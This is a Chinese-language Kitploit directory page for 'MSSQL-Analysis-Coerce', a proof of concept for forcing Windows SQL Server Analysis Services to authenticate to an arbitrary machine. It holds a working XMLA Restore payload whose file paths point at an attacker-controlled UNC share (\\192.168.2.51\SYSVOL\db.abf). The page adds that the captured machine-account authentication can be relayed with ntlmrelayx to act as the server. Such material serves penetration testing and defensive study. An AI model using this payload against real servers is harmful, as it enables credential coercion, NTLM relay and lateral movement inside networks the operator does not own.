Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
MSSQL-Analysis-Coerce — 一种强制 Windows SQL Server 在任意机器上进行身份验证的技术。 | Kitploit
工具/GitHubGitHub/p0dalirius/mssql-analysis-coerce
漏洞利用横向移动后渗透利用渗透测试红队对抗性攻击
GitHubp0dalirius/mssql-analysis-coerce

MSSQL-Analysis-Coerce

一种强制 Windows SQL Server 在任意机器上进行身份验证的技术。

查看仓库
133132年前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

MSSQL Analysis Services - Coerced Authentication

一种强制 Windows SQL Server 对任意计算机进行身份验证的技术。

该概念验证由以下人员共同撰写:

  • Podalirius: YouTube Channel Subscribers
  • Worty:

概念验证

为了触发以本地计算机账户身份进行身份验证,我们需要使用用户凭据连接到远程 SQL Server:

然后我们将选择“还原”(Restore),以从给定文件还原数据库。

要生成 XMLA 文件,请在“备份文件”(Backup File) 表单中放入一个随机文件的路径,并单击“确定”(Ok)。

然后将路径更改为一个随机文件,并将其替换为指向攻击者服务器的 UNC 路径(例如 \\192.168.128\SYSVOL\db.abf)

概念验证 XMLA 查询(poc.xmla):

root@kitploit:~
<Restore xmlns="http://schemas.microsoft.com/analysisservices/2003/engine">
    <File>\\192.168.2.51\SYSVOL\db.abf</File>
    <DatabaseName>\\192.168.2.51\SYSVOL\db.abf</DatabaseName>
    <DbStorageLocation xmlns="http://schemas.microsoft.com/analysisservices/2008/engine/100/100">\\192.168.2.51\SYSVOL\db.abf</DbStorageLocation>
</Restore>

然后我们就可以获得来自 SQL Server 本地计算机账户的身份验证:

中继为王

一旦获得身份验证,我们就可以使用 ntlmrelayx 中继该认证,以代表计算机 SQL01$ 执行许多操作。

这很酷,但要从 Linux 攻击机上触发这种强制身份验证却很复杂,因为我们无法使用 SQL Server Management Studio (SSMS)。

参考

  • https://docs.microsoft.com/en-us/sql/database-engine/install-windows/install-sql-server?view=sql-server-ver15
  • https://social.technet.microsoft.com/wiki/contents/articles/13106.sql-server-frequently-used-ports.aspx
  • https://docs.microsoft.com/en-us/answers/questions/274512/connecting-to-azure-analysis-services-using-python.html
下载工具